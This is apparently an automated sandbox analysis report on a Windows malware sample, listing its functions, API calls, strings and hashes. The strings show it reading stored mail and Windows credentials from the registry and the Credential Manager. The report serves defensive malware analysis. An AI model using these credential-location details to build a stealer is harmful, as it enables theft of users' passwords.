                                                                                                                                                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                                      Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                                      Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2449869053-232097475
                                                                                                                                                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                                      Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                                      • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                                      • API String ID: 665470638-2687544566
                                                                                                                                                                                                                                      • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                      • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                                                      Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                                                                      • API String ID: 551151806-1288872324
                                                                                                                                                                                                                                      • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                                      Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                                      Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                                      Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                                      Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                                      • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                                      • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                                      Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1416211542-0
                                                                                                                                                                                                                                      • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                      • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                                      Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                                      Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C9D
